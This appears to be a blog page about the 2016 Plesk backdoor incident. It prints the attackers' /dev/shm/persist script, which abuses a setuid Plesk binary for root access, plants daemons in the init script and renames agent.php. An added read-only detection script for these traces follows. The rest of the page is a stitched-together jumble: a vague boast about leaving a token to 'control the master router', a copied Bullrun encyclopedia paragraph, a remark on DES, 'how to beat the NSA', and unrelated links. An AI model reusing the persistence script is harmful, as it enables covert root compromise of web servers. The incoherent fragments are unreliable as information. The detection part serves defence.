Monday, August 29, 2016
Sunday, August 28, 2016
Saturday, August 27, 2016
Plesk backdoors, a very large number of servers compromised. (So industrial servers, as Siemens?? I heard a story, did you hear the same story?)
Attackers, using the bug http://kb.parallels.com/en/112303 were able to get access to PLESK installations and install backdoors in the systems. I'm using plural on backdoors, cause it's not just one, there are quite a few.
In some systems /dev/shm/persist was created with the following code:
# cat /dev/shm/persist
#!/bin/bash
# candidate Plesk binary directories
export PATHS="/opt/psa/bin /opt/psa/admin/bin /usr/local/psa/admin/bin /usr/local/psa/bin"
# look for a setuid sw-engine binary and use it as a root command runner
export MYSUDO=""
for n in $PATHS; do export MYSUDO="$MYSUDO $(ls $n/sw-engine-psa $n/sw-engine-plesk 2>/dev/null)";done
for n in $MYSUDO; do test -u $n && export MYSUDO=$n;done
# locate the planted psadmd/psadmind daemons
export PSAD=""
for n in $PATHS; do export PSAD="$PSAD $(ls $n/psadmd $n/psadmind 2>/dev/null)";done
# add each daemon to the Plesk init script (after the daemon_name line) and start it now
for PSADMD in $PSAD;do $MYSUDO "sed -i \"/daemon_name=sw-cp-serverd/a $PSADMD 2> \/dev\/null;\" /etc/init.d/psa";$MYSUDO $PSADMD;done
# move the legitimate agent.php aside
$MYSUDO 'mv /opt/psa/admin/htdocs/enterprise/control/agent.php /opt/psa/admin/htdocs/enterprise/control/old.php'
$MYSUDO 'mv /usr/local/psa/admin/htdocs/enterprise/control/agent.php /usr/local/psa/admin/htdocs/enterprise/control/old.php'
In some cases, this file was hex encoded, in others in plain text form.
http://www.my-audit.gr/hacking/plesk-backdoors-a-very-large-number-of-servers-compromised/
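Every step of that script leaves a trace that can be checked without running anything from the suspect host. The following is an added example, not code from the my-audit.gr write-up or from Plesk: a read-only POSIX shell check for the indicators the persist script creates (the dropper in /dev/shm, a setuid sw-engine-psa or sw-engine-plesk, the planted psadmd/psadmind binaries, the patched /etc/init.d/psa, and agent.php renamed to old.php). The root-directory argument and the PLESK_ROOT variable are assumptions added so the check can be pointed at a staged or mounted copy of a filesystem.

```shell
#!/bin/sh
# Added example (not from the my-audit.gr write-up): read-only check for the
# traces the /dev/shm/persist script leaves on a Plesk host.
# The first argument (root directory) is an assumed parameter so the check can
# be pointed at a staged tree; leave it empty to scan the live system.

PSA_BIN_DIRS="/opt/psa/bin /opt/psa/admin/bin /usr/local/psa/admin/bin /usr/local/psa/bin"
PSA_BASES="/opt/psa /usr/local/psa"

plesk_backdoor_check() {
    root="${1:-}"
    hits=0

    # 1. The dropper itself, kept in tmpfs so it disappears on reboot.
    if [ -e "$root/dev/shm/persist" ]; then
        echo "HIT: $root/dev/shm/persist present"
        hits=$((hits + 1))
    fi

    for d in $PSA_BIN_DIRS; do
        # 2. The script hunts for a setuid sw-engine binary to use as MYSUDO;
        #    a setuid copy here is what gives the backdoor root.
        for f in sw-engine-psa sw-engine-plesk; do
            if [ -u "$root$d/$f" ]; then
                echo "HIT: setuid $d/$f"
                hits=$((hits + 1))
            fi
        done
        # 3. psadmd / psadmind are the planted daemons, not Plesk components.
        for f in psadmd psadmind; do
            if [ -e "$root$d/$f" ]; then
                echo "HIT: planted daemon $d/$f"
                hits=$((hits + 1))
            fi
        done
    done

    # 4. sed -i appended a line launching the daemon after daemon_name=sw-cp-serverd.
    if [ -f "$root/etc/init.d/psa" ] && grep -qE '/(psadmd|psadmind)' "$root/etc/init.d/psa"; then
        echo "HIT: /etc/init.d/psa launches psadmd/psadmind"
        hits=$((hits + 1))
    fi

    # 5. agent.php was moved aside to old.php in either install prefix.
    for b in $PSA_BASES; do
        if [ -e "$root$b/admin/htdocs/enterprise/control/old.php" ]; then
            echo "HIT: $b/admin/htdocs/enterprise/control/old.php (agent.php renamed)"
            hits=$((hits + 1))
        fi
    done

    # Last line is machine-readable so the count can be consumed by a wrapper.
    echo "hits=$hits"
}

# Stand-alone use: PLESK_ROOT=/mnt/evidence sh check.sh, or no variable for the live host.
plesk_backdoor_check "${PLESK_ROOT:-}"
```

The checks are deliberately stat-only (no execution of anything under the Plesk prefixes), so they are safe to run from a rescue shell over a mounted image; a non-zero count is a reason to image the host rather than a reason to start cleaning it in place, since the setuid helper found in step 2 means anything else on the box may have been touched as root.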
If I had to guess I would code paste this, meaning I would make this call...to then "string sys_get_temp_dir ( void )" to leave a token that then would control the master router :) (because the backdoor is in fact on the router) ehehehe
webpy-php-port /webphp/web.php
https://searchcode.com/codesearch/view/13403593/
Bullrun (stylized BULLRUN) is a clandestine, highly classified decryption program run by the United States National Security Agency (NSA).[1][2] The British Government Communications Headquarters (GCHQ) has a similar program codenamed Edgehill. According to the BULLRUN classification guide published by The Guardian, the program uses multiple sources including computer network exploitation,[3] interdiction, industry relationships, collaboration with other intelligence community entities, and advanced mathematical techniques.
Key size was reduced to 56 bits because IBM wanted to fit LUCIFER on a single chip. LUCIFER then became DES.
Then... how to beat the NSA as a superpower and become as powerful as them?
parity check bit
https://www.mathworks.com/matlabcentral/newsreader/view_thread/93650